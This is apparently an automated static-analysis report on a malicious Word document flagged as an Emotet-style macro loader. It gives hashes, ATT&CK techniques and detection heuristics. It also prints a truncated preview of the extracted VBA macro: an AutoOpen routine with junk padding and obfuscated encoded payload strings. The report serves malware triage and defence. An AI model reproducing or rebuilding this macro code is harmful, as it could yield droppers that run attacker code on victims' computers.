Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 cbed81341e792afc…

MALICIOUS

Office (OLE)

Size: 145.5 KB
Created: 2018-04-12 12:33:00
Authoring application: Microsoft Office Word
First seen: 2019-09-30
MD5: e5f7f5cb4e6beead3097d34be8407a40
SHA-1: e6006e49f7a5d7ba1257416a00f818f0df39800f
SHA-256: cbed81341e792afcfa0e5678ca4045f7c255f597b7e7a60968597b83f3855a83
Risk Score: 204

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The sample is a malicious Office document containing a VBA macro. The AutoOpen macro is present and triggers a Shell() call, indicating an attempt to execute arbitrary code. This is characteristic of downloader or dropper malware. The presence of the 'macros.bas' file further supports the macro-based execution.

Heuristics 7

  • ClamAV: Doc.Malware.Emodldr-10025032-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Emodldr-10025032-0
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 134968 bytes
SHA-256: 95ce1617fc49932d88629c028ed2256e19e1eaafd094d4b9e73ba3d6d36fdf8e
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 44 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "bKdacZSuG"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
Select Case NcJPY
Case 49981
raidHZ = 88616
JmPzB = Tan(5 - CInt(LpldV) / fTvoTm + 525)
End Select
Application.Run zAOCC + "tqLdhwhG" + bUXlzz, dZEBpF + vQHChQNSfZSd + BmYmCw
Select Case XiuKU
Case 47848
OIXNwN = 71777
RzdViB = Tan(5 - CInt(qmdjGB) / cczFi + 6419)
End Select
End Sub

Attribute VB_Name = "dbfaHPQjosrIL"
Sub YIjRE(nHjnSp)
Select Case jvNqf
Case 65364
oYwvW = 73847
Kwkpzp = Tan(5 - CInt(DTTodZ) / WvrIS + 24549)
End Select
End Sub
Function vQHChQNSfZSd()
On Error Resume Next
Select Case PwAVf
Case 99590
Mrtjl = 44873
fvHwlz = Tan(5 - CInt(RRksCk) / vPUzpG + 36381)
End Select
XLYWwsuFdIh = WDjAwa("zBHWjHkAZQA1ADMAZQA0ADYAMgBjADQANwA4ADEAZgA0ADYANgA0AGYANQAzADMAMAA0AGYAOABkADQAMwAxAGMAB86", 7 + nzVjYk - nzVjYk, 82 + nzVjYk - nzVjYk)
Select Case Vulhm
Case 45507
UfVCVb = 34733
LwnKwj = Tan(5 - CInt(ccPNR) / YhvRiI + 50558)
End Select
Select Case jUhPh
Case 2497
UsHmc = 65073
EJNdsC = Tan(5 - CInt(FTQQD) / ZlZTJ + 90852)
End Select
pROLnPYbVa = WDjAwa("oMAYgA2ADQAOAAzADAAYgAzADMAYwBmADcAYwA0ADQAOAA5ADAANQA2ADMAMQBkADIAMgAzADkAZAA3ADEANQBiAGEAMABmAGUAZQA5ADYAZQBlADMAMABjAGUAMQBhAGUAMwA3ADcAMgAxADEANQBlADYAYgA1ADIAYwBmADYAMwA5ADkAZQA0AGYAYQAzAGYAMgA4A2V911f", 2 + NEMUk - NEMUk, 199 + NEMUk - NEMUk)
Select Case UlPzq
Case 99596
zRDqc = 47955
pBSom = Tan(5 - CInt(obBRz) / pzjTnd + 64749)
End Select
Select Case QFwGp
Case 23165
DOlHG = 85510
jnKra = Tan(5 - CInt(CBwld) / fSzWK + 59636)
End Select
SrECzC = WDjAwa("HRIAZABhADAAMgA2ADcAZgBjAGYANgBlADcAZAA2AGYAZgA0ADgAMwAyAGIAOQiCLA", 3 + PTuNm - PTuNm, 60 + PTuNm - PTuNm)
Select Case zTRkqX
Case 28403
UzDrG = 2944
waTKCS = Tan(5 - CInt(PGMcZ) / rDsbcd + 91084)
End Select
Select Case AOLFl
Case 51512
tUMiBM = 83508
MBzmdk = Tan(5 - CInt(NoYKF) / ziptf + 65790)
End Select
kzhZlhXmzz = WDjAwa("O9Hw3AGQAYQBkADAAYQA3ADUANABhAGIAZQA5ADIAYwAwADEAMgAyAGUAYQBmAGMANgA4ADQANwA2AGMAZAA2ADIAOQA3ADUL@Wj8", 5 + RCTUM - RCTUM, 92 + RCTUM - RCTUM)
Select Case RhDML
Case 11484
oazZf = 17739
vmqXI = Tan(5 - CInt(hAXhbV) / wmWlW + 58703)
End Select
Select Case RQTLiw
Case 8333
ztvLF = 22901
tacJmU = Tan(5 - CInt(LJifr) / fFBuo + 25720)
End Select
BRfaXfIwLV = WDjAwa("LK@aEAOQBhADgAMAAxADgAMwAxADMANQBmADMAMQBmAGEAYQA0ALW6w", 6 + Vfwlb - Vfwlb, 46 + Vfwlb - Vfwlb)
Select Case YsRFb
Case 83850
ONpwn = 23940
CHaRBT = Tan(5 - CInt(EKczH) / tsrAXr + 85583)
End Select
Select Case ucFRoz
Case 81119
hcmVM = 95779
iNcKQZ = Tan(5 - CInt(tsfFGV) / dXRWVL + 580)
End Select
KPkHYuSqQ = WDjAwa("%87lAGUAZQA2ADEAYQBhADAAOAA2AGIAYwBhAGIAZgBkAGQANwAyADYANABhAGMAOQA3ADgAYgAwADYAYwA4AGMAZgBhADEAMQAyADgAMAA4ADcAMABjADIAOQA5AGMAZgBhADcAYwA2ADcAZQBiADEANAA5ADgAZAA0AGIANwAzAGUAZgBkADkAYwA4ADIAOb23", 4 + BJXhu - BJXhu, 190 + BJXhu - BJXhu)
Select Case MZzUi
Case 88607
lXSti = 66620
UpaAFi = Tan(5 - CInt(mirVZ) / EVzrm + 56509)
End Select
Select Case dUqmSW
Case 35859
ZpiCG = 52423
aFMOtj = Tan(5 - CInt(qkfQw) / LkHsdP + 50681)
End Select
USrljoutEj = WDjAwa("9C6AzADMAMAAxADEAYwAwADAAMAA5AGMAZAA0ADEAYQAzADW618d", 4 + ADKvr - ADKvr, 44 + ADKvr - ADKvr)
Select Case sSiUSG
Case 62275
CUiVhk = 82099
qCMEiG = Tan(5 - CInt(Baito) / mYqAHi + 75313)
End Select
Select Case iwApNF
Case 53149
unTMK = 10266
TtptDU = Tan(5 - CInt(zUWCjM) / GWVDjn + 32732)
End Select
EIMcCUZJwN = WDjAwa("qzSpUA4AGUAOQAwAGQAYQA2ADEANQBlADkAMgA0AGQANwA0ADgAMAAyAGYAMwAxAGIAYQA4AGYANwBmADMANQBjAGUA88wC", 6 + ubdrri - ubdrri, 86 + ubdrri - ubdrri)
Select Case QUTPjL
Case 24726
wwIjz = 1484
BtaABj = Tan(5 - CInt(LWPno) / zIiRP + 43839)
End Select
Select Case MUTruz
Case 29007
kcuIYL = 58048
BimrFY = Tan(5 - CInt(CdMac) / JOtvo + 46103)
End Select
pwXAAMaYp = WDjAwa("8HpgA3ADEAMABiADkANwA3ADQAMAA3ADQAMQA3ADEANQA2ADqwAQC", 4 + 
... (truncated)